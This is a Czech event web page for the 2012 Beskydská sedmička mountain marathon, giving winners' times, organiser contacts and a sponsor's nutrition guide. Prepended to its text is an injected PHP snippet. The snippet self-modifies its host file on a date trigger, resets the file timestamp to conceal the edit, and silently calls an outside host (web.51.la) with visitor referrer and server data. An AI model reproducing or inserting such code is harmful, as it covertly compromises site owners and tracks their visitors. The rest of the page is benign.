check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456735874){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=15&id=18776897&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/modules/mod_banners/models.php"); } PRŮVODCE VÝŽIVOU PRO BESKYDSKOU SEDMIČKU 2012
           
www.continental.cz
M ČR V HORSKÉM MARATONU DVOJIC
EXTRÉMNÍ PŘECHOD BESKYD - JAVOROVÝ - JAVORNÍK 2012
HLAVNÍ STRÁNKAVÝSLEDKOVÁ LISTINAINFO ZE ZÁVODUMÉDIA / PRESSFOTOGALERIE

VÍTĚZNÉ TÝMY MČR

1.MÍSTO
194 - SALOMON-RUN
PETREČEK TOMÁŠ
ŠTRYNCL PAVEL

ČAS VÍTĚZE: 13:05:04

2.MÍSTO
117 - SLS3-SKVK
CYPRA ZBYNĚK
VABROUŠEK PETR
ČAS: 13:13:31

3.MÍSTO
253 - L4L5S1
POLÁK VLADIMÍR
NAHORNIAK TOMÁŠ
ČAS: 13:51:24 

UPOUTÁVKY 2012

BESKYDSKÁ SEDMIČKA - 2012


REGISTRACE B7 - 2012


INLINE 24 - 2012


LH 24 - 2012

KONTAKT NA ORGANIZAČNÍ TEAM:
Pořadatel akce SK K2 o.s., Libor Uher
Česká asociace extrémních
sportů - ČAES

Vedení závodu
Libor Uher
+420 608 228 227
libor@beskydskasedmicka.cz

Jana Matějíková
presscentrum
+420 602 936 634
info@beskydskasedmicka.cz


MUDr. Radomír Maráček
organizační tým B7, doprava, lékař
rm@beskydskasedmicka.cz


Registrace závodu

Kateřina Uhrová
+420 603 228 228
registrace@beskydska
sedmicka.cz


Marian Žárský
kulturní program Frenštát
marian@beskydskasedmicka.cz


Martina Filipová

organizační tým B7
martina@beskydskasedmicka.cz


Tomáš Janeček

grafika, web, technik
+420 777 712 747
tomas@beskydskasedmicka.cz


Iveta Nakoukalová

dobrovolníci, akreditace
iveta@beskydskasedmicka.cz


Mirek Prašivka

všechno ostatní :-)

Tomáš Zatloukal
doprava pořadatelů

Petr Kalina
značení a úklid trati

Dušan Klimek
technické zajištění Frenštát



PRŮVODCE VÝŽIVOU PRO BESKYDSKOU SEDMIČKU 2012

Základní zásady pro váš závod: (celý článek si můžete stáhnout zde)

1. TEKUTINY

Pravidelně doplňujte v průběhu celého závodu tekutiny. Doporučujeme hypotonické ředění sportovního nápoje ISODRINX (35 g – jedna odměrka - do cca 800 - 1000 ml čisté vody). Lze jej zalít i teplou vodou – prohřeje organismus a zabrání nebezpečné dehydrataci.

Sportovní nápoj můžete střídat s teplým čajem – doporučujeme osladit medem a přidat citrón pro osvěžení.

Pijte pravidelně, každých 15 - 20 minut závodu. Více o produktu ISODRINX naleznete zde



2. ENERGIE

Pokud chcete vydržet celý závod, potřebujete dostatečný přísun energie. Je efektivnější energetické krizi předcházet, než ji následně řešit. Doplňky výživy od společnosti NUTREND vám budou výborným parťákem na celý závod, ale vždy byste je měli kombinovat s běžnou stravou jako je ovoce, pečivo či teplá polévka.

Každou hodinu závodu byste měli přijmout 30 – 60 g sacharidů.

Ideální je použít v první polovině závodu každou hodinu ½ energetického gelu ENDUROSNACK. Gel je vhodné kombinovat s půlhodinovým odstupem např. s pečivem či ovocem nebo polévkou. Pokud preferujete místo gelů tyčinku, pak gel můžete nahradit tyčinkou POWER BIKE BAR.

S přibývající únavou a kilometry nezapomínejte i na jídlo které vás zasytí. Hlaďák může být velkým nepřítelem. Hlad zažene tyčinka VOLTAGE ENERGY CAKE nebo WELLNESS OATS CAKE. Tyčinky můžete opět kombinovat s běžnou stravou.

V polovině závodu můžete pro povzbuzení těla a mysli použít stimulant SHLEHA. Produkt, který je složen rostlinných extraktů obsahuje celkem 140 mg kofeinu. SHLEHu můžete opět využít i ve finální fázi závodu, kdy budete potřebovat dodat energii do závěrečných kilometrů.

TIP PRO ŘEŠENÍ ENERGETICKÉ KRIZE

Přes všechny přípravy a pravidelnou stravu se může stát, že vás únava dožene. Pro rychlé vyřešení energetické krize můžete použít gel CARBOSNACK. Doporučujeme jej ale použít až v druhé polovině závodu. A vždy jej kombinujte s běžnou stravou, ať po rychlém nabuzení nepřijde opět rychlý útlum.

TIP PRO ŘEŠENÍ SVALOVÝCH KŘEČÍ

Aby vás svalové křeče nepřekvapily v průběhu závodu, je potřeba dodržovat několik zásad. Od dostatečné hydratace, přes pravidelný přísun energie a minerálů. Přes všechnu snahu se ale svalové křeče s přibývající únavou mohou objevit, proto doporučujeme mít připravený MAGNESLIFE, vysoce efektivní roztok hořčíku s vitaminem B6.


3. REGENERACE

Po skončení závodu nepodceňujte nastartování regenerace. Zaměřte se na dostatečný přísun vitaminů a minerálů a kvalitních sacharidů. Vyzkoušet můžete např. REGENER nebo tyčinku REGENER bar, které vám pomohou urychlit regeneraci. Večer před spaním vypijte i dávku MAGNESLIFE, tekutý roztok hořčíku s vitaminem B6 uvolní svalové napětí.










Více informací o produktech se dozvíte na webových stránkách www.nutrend.cz nebo osobně při prezentaci závodu na stánku NUTREND, kde pro vás budou produkty za zvýhodněnou cenu.

 

 

GENERÁLNÍ PARTNEŘI

adidas


1511


PARTNEŘI

IBS    
Frenštát pod Radhoštěm


www.rajpneu.cz



Author




I style









 

black


Nutrend

radegast


 
 



 

black


 


 

Suunto


 

 



Frýdek-Místek     Obec Ostravice

 

       

  

Opavanet

 

Sportovní medicína

 
 

Mapy Shokart





 

Author




In agency    



Škola - Frenštát pod Radhoštěm SK Valašské království


KLUB ČESKÝCH TURISTŮ










 

CAES


CAES

CAES